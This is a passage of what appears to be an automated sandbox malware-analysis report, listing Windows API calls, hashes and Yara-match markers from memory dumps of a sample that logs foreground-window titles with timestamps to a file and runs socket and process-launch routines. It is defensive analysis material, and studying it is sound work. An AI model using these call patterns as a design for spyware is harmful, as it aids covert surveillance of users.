                                                                                                                            • API String ID: 1400036169-0
                                                                                                                            APIs
                                                                                                                            • SetLastError.KERNEL32(0000139F,9426D0E6,?,?,?,?,00000000,000000FF,00000000), ref: 02C34CC6
                                                                                                                            • EnterCriticalSection.KERNEL32(?,9426D0E6,?,?,?,?,00000000,000000FF,00000000), ref: 02C34CED
                                                                                                                            • SetLastError.KERNEL32(0000139F,?,?,00000000,000000FF), ref: 02C34D01
                                                                                                                            • LeaveCriticalSection.KERNEL32(?,?,?,00000000,000000FF), ref: 02C34D08
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.4135787709.0000000002C31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C30000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.4135760827.0000000002C30000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000005.00000002.4135972219.0000000002C45000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000005.00000002.4136032011.0000000002C49000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000005.00000002.4136083434.0000000002C4F000.00000020.00001000.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000005.00000002.4136123182.0000000002C51000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_2c30000_HGwpjJUqhW.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CriticalErrorLastSection$EnterLeave
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2124651672-0
                                                                                                                            APIs
                                                                                                                            • SetLastError.KERNEL32(0000139F,95401134,?,?,?,?,00000000,000000FF,00000000), ref: 03624CE6
                                                                                                                            • EnterCriticalSection.KERNEL32(?,95401134,?,?,?,?,00000000,000000FF,00000000), ref: 03624D0D
                                                                                                                            • SetLastError.KERNEL32(0000139F,?,?,00000000,000000FF), ref: 03624D21
                                                                                                                            • LeaveCriticalSection.KERNEL32(?,?,?,00000000,000000FF), ref: 03624D28
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.4138706981.0000000003620000.00000040.00001000.00020000.00000000.sdmp, Offset: 03620000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.4138706981.0000000003654000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_3620000_HGwpjJUqhW.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: CriticalErrorLastSection$EnterLeave
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2124651672-0
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.4138171023.00000000034A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 034A0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_34a0000_HGwpjJUqhW.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: _memset$_wcsrchr
                                                                                                                            • String ID: D
                                                                                                                            • API String ID: 170005318-2746444292
                                                                                                                            APIs
                                                                                                                            • _memset.LIBCMT ref: 0362E751
                                                                                                                            • GetForegroundWindow.USER32(?,74DF23A0,00000000), ref: 0362E759
                                                                                                                            • GetWindowTextW.USER32(00000000,036516F0,00000800), ref: 0362E76F
                                                                                                                            • _memset.LIBCMT ref: 0362E78D
                                                                                                                            • lstrlenW.KERNEL32(036516F0,?,?,?,?,74DF23A0,00000000), ref: 0362E7AC
                                                                                                                            • GetLocalTime.KERNEL32(?,?,?,?,?,74DF23A0,00000000), ref: 0362E7BD
                                                                                                                            • wsprintfW.USER32 ref: 0362E804
                                                                                                                              • Part of subcall function 0362E6B0: WaitForSingleObject.KERNEL32(00000000,000000FF,00000000,?,?,0362E815,?,?,?,?,74DF23A0,00000000), ref: 0362E6BD
                                                                                                                              • Part of subcall function 0362E6B0: CreateFileW.KERNEL32(03650D80,40000000,00000002,00000000,00000004,00000002,00000000,?,?,0362E815,?,?,?,?,74DF23A0,00000000), ref: 0362E6D7
                                                                                                                              • Part of subcall function 0362E6B0: SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 0362E6F2
                                                                                                                              • Part of subcall function 0362E6B0: lstrlenW.KERNEL32(?,00000000,00000000), ref: 0362E6FF
                                                                                                                              • Part of subcall function 0362E6B0: WriteFile.KERNEL32(00000000,?,00000000), ref: 0362E70A
                                                                                                                              • Part of subcall function 0362E6B0: CloseHandle.KERNEL32(00000000), ref: 0362E711
                                                                                                                              • Part of subcall function 0362E6B0: ReleaseMutex.KERNEL32(00000000), ref: 0362E71E
                                                                                                                            • _memset.LIBCMT ref: 0362E820
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.4138706981.0000000003620000.00000040.00001000.00020000.00000000.sdmp, Offset: 03620000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.4138706981.0000000003654000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_3620000_HGwpjJUqhW.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: File_memset$Windowlstrlen$CloseCreateForegroundHandleLocalMutexObjectPointerReleaseSingleTextTimeWaitWritewsprintf
                                                                                                                            • String ID: [
                                                                                                                            • API String ID: 2192163267-4056885943
                                                                                                                            • Opcode ID: 5d3dc7f99670fad3b6812652cc2576eebed75902ef26ad59f1a08f8ead74e463
                                                                                                                            • Instruction ID: a122938a26d6ef3279207c5eb198f5f9567455a5ae3d0fc0b2cb6791d3529f88
                                                                                                                            • Opcode Fuzzy Hash: 5d3dc7f99670fad3b6812652cc2576eebed75902ef26ad59f1a08f8ead74e463
                                                                                                                            • Instruction Fuzzy Hash: 1C21E575E00228AACB60EF50DC05BBB77BDFF05700F1485A9F984A6148EE745A95CFE4
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.4135368981.0000000002880000.00000040.00001000.00020000.00000000.sdmp, Offset: 02880000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_2880000_HGwpjJUqhW.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: _memset
                                                                                                                            • String ID: !jWW$.$_$i$l${vU_
                                                                                                                            • API String ID: 2102423945-3065862289
                                                                                                                            • Opcode ID: 2b6eedebc133e2266d96017898138cdc43810d24d5c9c443b0251b8ba9ddad3f
                                                                                                                            • Instruction ID: 210e0eef4d10793b3b6c604a218da7eae3ed28ac62738a6c828c410fdd9796dc
                                                                                                                            • Opcode Fuzzy Hash: 2b6eedebc133e2266d96017898138cdc43810d24d5c9c443b0251b8ba9ddad3f
                                                                                                                            • Instruction Fuzzy Hash: 7F216078A403649FD720EF54CC80FAABBB5FF85700F0481CAE64C9A645DBB19A84CF52
                                                                                                                            APIs
                                                                                                                            • EnterCriticalSection.KERNEL32(?,?,?,?,0362398D,?,00000000,000000FF,00000000), ref: 03623E05
                                                                                                                            • LeaveCriticalSection.KERNEL32(?,?,?,0362398D,?,00000000,000000FF,00000000), ref: 03623E50
                                                                                                                            • send.WS2_32(?,000000FF,00000000,00000000), ref: 03623E6E
                                                                                                                            • EnterCriticalSection.KERNEL32(?), ref: 03623E81
                                                                                                                            • LeaveCriticalSection.KERNEL32(?), ref: 03623E94
                                                                                                                            • HeapFree.KERNEL32(00000000,00000000,?,?,?,0362398D,?,00000000,000000FF,00000000), ref: 03623EBC
                                                                                                                            • WSAGetLastError.WS2_32(?,?,0362398D,?,00000000,000000FF,00000000), ref: 03623EC7
                                                                                                                            • EnterCriticalSection.KERNEL32(?,?,?,0362398D,?,00000000,000000FF,00000000), ref: 03623EDB
                                                                                                                            • LeaveCriticalSection.KERNEL32(?), ref: 03623F14
                                                                                                                            • HeapFree.KERNEL32(00000000,00000000,?), ref: 03623F51
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.4138706981.0000000003620000.00000040.00001000.00020000.00000000.sdmp, Offset: 03620000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.4138706981.0000000003654000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_3620000_HGwpjJUqhW.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: CriticalSection$EnterLeave$FreeHeap$ErrorLastsend
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1701177279-0
                                                                                                                            • Opcode ID: d9452dc1e97e3283f142f93d7338fc759c74253d04a5a7a497979716add5d0bd
                                                                                                                            • Instruction ID: 23c9bde40c7303334066c4a28ba8a80952739d53f6bc5a735a065b2e284e7d36
                                                                                                                            • Opcode Fuzzy Hash: d9452dc1e97e3283f142f93d7338fc759c74253d04a5a7a497979716add5d0bd
                                                                                                                            • Instruction Fuzzy Hash: CE413979504B049FC724DF78D988AA7BBF8BB48300F65896EE85ECB344D734A4058F60
                                                                                                                            APIs
                                                                                                                            • WSASetLastError.WS2_32(0000000D,00000000,000000FF,00000000,000000FF,00000000), ref: 02C34F43
                                                                                                                            • EnterCriticalSection.KERNEL32(000002FF,00000000,000000FF,00000000,000000FF,00000000), ref: 02C34F58
                                                                                                                            • WSASetLastError.WS2_32(00002746), ref: 02C34F6A
                                                                                                                            • LeaveCriticalSection.KERNEL32(000002FF), ref: 02C34F71
                                                                                                                            • timeGetTime.WINMM ref: 02C34F9F
                                                                                                                            • timeGetTime.WINMM ref: 02C34FC7
                                                                                                                            • SetEvent.KERNEL32(?), ref: 02C35005
                                                                                                                            • InterlockedExchange.KERNEL32(?,00000001), ref: 02C35011
                                                                                                                            • LeaveCriticalSection.KERNEL32(000002FF), ref: 02C35018
                                                                                                                            • LeaveCriticalSection.KERNEL32(000002FF), ref: 02C3502B
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.4135787709.0000000002C31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C30000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.4135760827.0000000002C30000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000005.00000002.4135972219.0000000002C45000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000005.00000002.4136032011.0000000002C49000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000005.00000002.4136083434.0000000002C4F000.00000020.00001000.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000005.00000002.4136123182.0000000002C51000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_2c30000_HGwpjJUqhW.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CriticalSection$Leave$ErrorLastTimetime$EnterEventExchangeInterlocked
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1979691958-0
                                                                                                                            • Opcode ID: 8141fad481ab3dd1a016163c1db92ad8aaf34e9f5bc4ef627a8531c03f4f7083
                                                                                                                            • Instruction ID: 5a4d1984e6c62a6a5b1283ab94bd900380b1f1ae987692edd47b36f820f73044
                                                                                                                            • Opcode Fuzzy Hash: 8141fad481ab3dd1a016163c1db92ad8aaf34e9f5bc4ef627a8531c03f4f7083
                                                                                                                            • Instruction Fuzzy Hash: AA412235A002009FD731DF29D948B6AB7EAFF8C314F484E58E84ACB241E776E9408B81
                                                                                                                            APIs
                                                                                                                            • WSASetLastError.WS2_32(0000000D,00000000,000000FF,00000000,000000FF,00000000), ref: 03624F63
                                                                                                                            • EnterCriticalSection.KERNEL32(000002FF,00000000,000000FF,00000000,000000FF,00000000), ref: 03624F78
                                                                                                                            • WSASetLastError.WS2_32(00002746), ref: 03624F8A
                                                                                                                            • LeaveCriticalSection.KERNEL32(000002FF), ref: 03624F91
                                                                                                                            • timeGetTime.WINMM ref: 03624FBF
                                                                                                                            • timeGetTime.WINMM ref: 03624FE7
                                                                                                                            • SetEvent.KERNEL32(?), ref: 03625025
                                                                                                                            • InterlockedExchange.KERNEL32(?,00000001), ref: 03625031
                                                                                                                            • LeaveCriticalSection.KERNEL32(000002FF), ref: 03625038
                                                                                                                            • LeaveCriticalSection.KERNEL32(000002FF), ref: 0362504B
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.4138706981.0000000003620000.00000040.00001000.00020000.00000000.sdmp, Offset: 03620000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.4138706981.0000000003654000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_3620000_HGwpjJUqhW.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: CriticalSection$Leave$ErrorLastTimetime$EnterEventExchangeInterlocked
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1979691958-0
                                                                                                                            • Opcode ID: 30ea54806ba0c9227c055d55a3f2d851c46f8d410a011330c6853569a702d970
                                                                                                                            • Instruction ID: 3ef3a4dab1e432e2110f60b2a83570367d8295d50decdf29f7eca2e6d0c9d6be
                                                                                                                            • Opcode Fuzzy Hash: 30ea54806ba0c9227c055d55a3f2d851c46f8d410a011330c6853569a702d970
                                                                                                                            • Instruction Fuzzy Hash: 8B410735600B008FC731DF6ADA44A6ABBE9FF84710F194999E94AC7745E735E4408F40
                                                                                                                            APIs
                                                                                                                            • _memset.LIBCMT ref: 0362C2AE
                                                                                                                            • CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000002,00000000,00000000), ref: 0362C2CC
                                                                                                                            • WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 0362C309
                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 0362C314
                                                                                                                            • lstrlenW.KERNEL32(?), ref: 0362C321
                                                                                                                            • wsprintfW.USER32 ref: 0362C345
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.4138706981.0000000003620000.00000040.00001000.00020000.00000000.sdmp, Offset: 03620000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.4138706981.0000000003654000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_3620000_HGwpjJUqhW.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: File$CloseCreateHandleWrite_memsetlstrlenwsprintf
                                                                                                                            • String ID: %s %s
                                                                                                                            • API String ID: 1326869720-2939940506
                                                                                                                            • Opcode ID: 04b6194f212b9bb20caa692b2faffe3d943284089c93164372590ee29960dbbb
                                                                                                                            • Instruction ID: 86d9e43f48487243192f6df17c31b0d887b4f4d49d1bef5069abdf7af8adc167
                                                                                                                            • Opcode Fuzzy Hash: 04b6194f212b9bb20caa692b2faffe3d943284089c93164372590ee29960dbbb
                                                                                                                            • Instruction Fuzzy Hash: 1A31F536A00628ABDB24EB64DC84FEF777CFB05310F400699B606EB184DB305A44CFA4
                                                                                                                            APIs
                                                                                                                            • lstrlenW.KERNEL32(?), ref: 0362C98D
                                                                                                                            • _wcsrchr.LIBCMT ref: 0362C9C7
                                                                                                                              • Part of subcall function 03627C80: LoadLibraryW.KERNEL32(wininet.dll), ref: 03627CC3
                                                                                                                              • Part of subcall function 03627C80: GetProcAddress.KERNEL32(00000000,InternetOpenW), ref: 03627CD7
                                                                                                                              • Part of subcall function 03627C80: FreeLibrary.KERNEL32(00000000), ref: 03627CF7
                                                                                                                            • GetFileAttributesW.KERNEL32(-00000002), ref: 0362C9E6
                                                                                                                            • GetLastError.KERNEL32 ref: 0362C9F1
                                                                                                                            • _memset.LIBCMT ref: 0362CA04
                                                                                                                            • CreateProcessW.KERNEL32(00000000,-00000002,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 0362CA31
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.4138706981.0000000003620000.00000040.00001000.00020000.00000000.sdmp, Offset: 03620000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.4138706981.0000000003654000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_3620000_HGwpjJUqhW.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: Library$AddressAttributesCreateErrorFileFreeLastLoadProcProcess_memset_wcsrchrlstrlen
                                                                                                                            • String ID: D$WinSta0\Default
                                                                                                                            • API String ID: 174883095-1101385590
                                                                                                                            • Opcode ID: 43f59136a448a64c8cd8eddfba25e9fc2526ac52396db990730d7a840ae00025
                                                                                                                            • Instruction ID: c4b22cfec89a305b447ccc5a16f0ceb43c3546a8207943b86b678624a9d86fd3
                                                                                                                            • Opcode Fuzzy Hash: 43f59136a448a64c8cd8eddfba25e9fc2526ac52396db990730d7a840ae00025
                                                                                                                            • Instruction Fuzzy Hash: D0115BB6D0061827D720E6B49C45FBFBF6C9B41710F050129FA069E2C4EB75D505CAA5
                                                                                                                            APIs
                                                                                                                            • lstrcmpiW.KERNEL32(?,A:\), ref: 03628166
                                                                                                                            • lstrcmpiW.KERNEL32(?,B:\), ref: 03628176
                                                                                                                            • QueryDosDeviceW.KERNEL32(?,?,00000064), ref: 036281A6
                                                                                                                            • lstrlenW.KERNEL32(?), ref: 036281B7
                                                                                                                            • __wcsnicmp.LIBCMT ref: 036281CE
                                                                                                                            • lstrcpyW.KERNEL32(00000AD4,?), ref: 03628204
                                                                                                                            • lstrcpyW.KERNEL32(?,?), ref: 03628228
                                                                                                                            • lstrcatW.KERNEL32(?,00000000), ref: 03628233
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.4138706981.0000000003620000.00000040.00001000.00020000.00000000.sdmp, Offset: 03620000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.4138706981.0000000003654000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_3620000_HGwpjJUqhW.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: lstrcmpilstrcpy$DeviceQuery__wcsnicmplstrcatlstrlen
                                                                                                                            • String ID: A:\$B:\
                                                                                                                            • API String ID: 4249875308-1009255891
                                                                                                                            APIs
                                                                                                                            • CreateEventW.KERNEL32(00000000,00000001,00000001,00000000,95401134,00000000,?,?,?,00000000,0364125B,000000FF,?,0362E04E,00000000), ref: 03629773
                                                                                                                            • InitializeCriticalSectionAndSpinCount.KERNEL32(0362E1AE,00000000,?,?,?,00000000,0364125B,000000FF,?,0362E04E), ref: 03629812
                                                                                                                            • CreateEventW.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,00000000,0364125B,000000FF,?,0362E04E), ref: 03629850
                                                                                                                            • CreateEventW.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,00000000,0364125B,000000FF,?,0362E04E), ref: 03629875
                                                                                                                            • CreateEventW.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,00000000,0364125B,000000FF,?,0362E04E), ref: 0362989A
                                                                                                                              • Part of subcall function 03621280: __CxxThrowException@8.LIBCMT ref: 03621290
                                                                                                                              • Part of subcall function 03621280: DeleteCriticalSection.KERNEL32(00000000,0362D3E6,03646624,?,?,0362D3E6,?,?,?,?,03645A40,00000000), ref: 036212A1
                                                                                                                              • Part of subcall function 0362CE10: InitializeCriticalSectionAndSpinCount.KERNEL32(0362E076,00000000,95401134,0362E04E,74DF2F60,00000000,?,0362E226,0364110B,000000FF,?,0362994A,0362E226), ref: 0362CE67
                                                                                                                              • Part of subcall function 0362CE10: InitializeCriticalSectionAndSpinCount.KERNEL32(0362E08E,00000000,?,0362E226,0364110B,000000FF,?,0362994A,0362E226,?,?,?,00000000,0364125B,000000FF), ref: 0362CE83
                                                                                                                            • InterlockedExchange.KERNEL32(0362E066,00000000), ref: 036299A0
                                                                                                                            • timeGetTime.WINMM(?,?,?,00000000,0364125B,000000FF,?,0362E04E), ref: 036299A6
                                                                                                                            • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,?,?,00000000,0364125B,000000FF,?,0362E04E), ref: 036299B4
                                                                                                                            • CreateEventW.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,00000000,0364125B,000000FF,?,0362E04E), ref: 036299BD
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.4138706981.0000000003620000.00000040.00001000.00020000.00000000.sdmp, Offset: 03620000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.4138706981.0000000003654000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_3620000_HGwpjJUqhW.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CreateEvent$CriticalSection$CountInitializeSpin$DeleteException@8ExchangeInterlockedThrowTimetime
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1400036169-0
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 02C33660: CreateWaitableTimerW.KERNEL32(00000000,00000000,00000000), ref: 02C33667
                                                                                                                              • Part of subcall function 02C33660: _free.LIBCMT ref: 02C3369C
                                                                                                                              • Part of subcall function 02C33660: _malloc.LIBCMT ref: 02C336D7
                                                                                                                              • Part of subcall function 02C33660: _memset.LIBCMT ref: 02C336E5
                                                                                                                            • InterlockedIncrement.KERNEL32(02C4D990), ref: 02C33565
                                                                                                                            • InterlockedIncrement.KERNEL32(02C4D990), ref: 02C33573
                                                                                                                            • setsockopt.WS2_32(?,0000FFFF,00001001,?,00000004), ref: 02C3359A
                                                                                                                            • setsockopt.WS2_32(?,0000FFFF,00001002,?,00000004), ref: 02C335B3
                                                                                                                            • ResetEvent.KERNEL32(?,?,?,02C4D990), ref: 02C335EE
                                                                                                                            • SetLastError.KERNEL32(00000000), ref: 02C33621
                                                                                                                            • GetLastError.KERNEL32 ref: 02C33639
                                                                                                                              • Part of subcall function 02C33F60: GetCurrentThreadId.KERNEL32 ref: 02C33F65
                                                                                                                              • Part of subcall function 02C33F60: send.WS2_32(?,02C47440,00000010,00000000), ref: 02C33FC6
                                                                                                                              • Part of subcall function 02C33F60: SetEvent.KERNEL32(?), ref: 02C33FE9
                                                                                                                              • Part of subcall function 02C33F60: InterlockedExchange.KERNEL32(?,00000000), ref: 02C33FF5
                                                                                                                              • Part of subcall function 02C33F60: WSACloseEvent.WS2_32(?), ref: 02C34003
                                                                                                                              • Part of subcall function 02C33F60: shutdown.WS2_32(?,00000001), ref: 02C3401B
                                                                                                                              • Part of subcall function 02C33F60: closesocket.WS2_32(?), ref: 02C34025
                                                                                                                            • SetLastError.KERNEL32(00000000), ref: 02C33649
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.4135787709.0000000002C31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C30000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.4135760827.0000000002C30000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000005.00000002.4135972219.0000000002C45000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000005.00000002.4136032011.0000000002C49000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000005.00000002.4136083434.0000000002C4F000.00000020.00001000.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000005.00000002.4136123182.0000000002C51000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_2c30000_HGwpjJUqhW.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ErrorEventInterlockedLast$Incrementsetsockopt$CloseCreateCurrentExchangeResetThreadTimerWaitable_free_malloc_memsetclosesocketsendshutdown
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 127459856-0
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 03623660: CreateWaitableTimerW.KERNEL32(00000000,00000000,00000000), ref: 03623667
                                                                                                                              • Part of subcall function 03623660: _free.LIBCMT ref: 0362369C
                                                                                                                              • Part of subcall function 03623660: _malloc.LIBCMT ref: 036236D7
                                                                                                                              • Part of subcall function 03623660: _memset.LIBCMT ref: 036236E5
                                                                                                                            • InterlockedIncrement.KERNEL32(03651F0C), ref: 03623565
                                                                                                                            • InterlockedIncrement.KERNEL32(03651F0C), ref: 03623573
                                                                                                                            • setsockopt.WS2_32(?,0000FFFF,00001001,?,00000004), ref: 0362359A
                                                                                                                            • setsockopt.WS2_32(?,0000FFFF,00001002,?,00000004), ref: 036235B3
                                                                                                                            • ResetEvent.KERNEL32(?,?,?,03651F0C), ref: 036235EE
                                                                                                                            • SetLastError.KERNEL32(00000000), ref: 03623621
                                                                                                                            • GetLastError.KERNEL32 ref: 03623639
                                                                                                                              • Part of subcall function 03623F60: GetCurrentThreadId.KERNEL32 ref: 03623F65
                                                                                                                              • Part of subcall function 03623F60: send.WS2_32(?,036449C0,00000010,00000000), ref: 03623FC6
                                                                                                                              • Part of subcall function 03623F60: SetEvent.KERNEL32(?), ref: 03623FE9
                                                                                                                              • Part of subcall function 03623F60: InterlockedExchange.KERNEL32(?,00000000), ref: 03623FF5
                                                                                                                              • Part of subcall function 03623F60: WSACloseEvent.WS2_32(?), ref: 03624003
                                                                                                                              • Part of subcall function 03623F60: shutdown.WS2_32(?,00000001), ref: 0362401B
                                                                                                                              • Part of subcall function 03623F60: closesocket.WS2_32(?), ref: 03624025
                                                                                                                            • SetLastError.KERNEL32(00000000), ref: 03623649
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.4138706981.0000000003620000.00000040.00001000.00020000.00000000.sdmp, Offset: 03620000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.4138706981.0000000003654000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_3620000_HGwpjJUqhW.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ErrorEventInterlockedLast$Incrementsetsockopt$CloseCreateCurrentExchangeResetThreadTimerWaitable_free_malloc_memsetclosesocketsendshutdown
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 127459856-0
                                                                                                                            APIs
                                                                                                                            • ResetEvent.KERNEL32(?), ref: 02C34443
                                                                                                                            • ResetEvent.KERNEL32(?), ref: 02C3444C
                                                                                                                            • timeGetTime.WINMM ref: 02C3444E
                                                                                                                            • InterlockedExchange.KERNEL32(?,00000000), ref: 02C3445D
                                                                                                                            • WaitForSingleObject.KERNEL32(?,00001770), ref: 02C344AB
                                                                                                                            • ResetEvent.KERNEL32(?), ref: 02C344C8
                                                                                                                              • Part of subcall function 02C33F60: GetCurrentThreadId.KERNEL32 ref: 02C33F65
                                                                                                                              • Part of subcall function 02C33F60: send.WS2_32(?,02C47440,00000010,00000000), ref: 02C33FC6
                                                                                                                              • Part of subcall function 02C33F60: SetEvent.KERNEL32(?), ref: 02C33FE9
                                                                                                                              • Part of subcall function 02C33F60: InterlockedExchange.KERNEL32(?,00000000), ref: 02C33FF5
                                                                                                                              • Part of subcall function 02C33F60: WSACloseEvent.WS2_32(?), ref: 02C34003
                                                                                                                              • Part of subcall function 02C33F60: shutdown.WS2_32(?,00000001), ref: 02C3401B
                                                                                                                              • Part of subcall function 02C33F60: closesocket.WS2_32(?), ref: 02C34025
                                                                                                                            • ResetEvent.KERNEL32(?), ref: 02C344DC
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.4135787709.0000000002C31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C30000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.4135760827.0000000002C30000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000005.00000002.4135972219.0000000002C45000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000005.00000002.4136032011.0000000002C49000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000005.00000002.4136083434.0000000002C4F000.00000020.00001000.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000005.00000002.4136123182.0000000002C51000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_2c30000_HGwpjJUqhW.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Event$Reset$ExchangeInterlocked$CloseCurrentObjectSingleThreadTimeWaitclosesocketsendshutdowntime
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 542259498-0
                                                                                                                            APIs
                                                                                                                            • ResetEvent.KERNEL32(?), ref: 03624443
                                                                                                                            • ResetEvent.KERNEL32(?), ref: 0362444C
                                                                                                                            • timeGetTime.WINMM ref: 0362444E
                                                                                                                            • InterlockedExchange.KERNEL32(?,00000000), ref: 0362445D
                                                                                                                            • WaitForSingleObject.KERNEL32(?,00001770), ref: 036244AB
                                                                                                                            • ResetEvent.KERNEL32(?), ref: 036244C8
                                                                                                                              • Part of subcall function 03623F60: GetCurrentThreadId.KERNEL32 ref: 03623F65
                                                                                                                              • Part of subcall function 03623F60: send.WS2_32(?,036449C0,00000010,00000000), ref: 03623FC6
                                                                                                                              • Part of subcall function 03623F60: SetEvent.KERNEL32(?), ref: 03623FE9
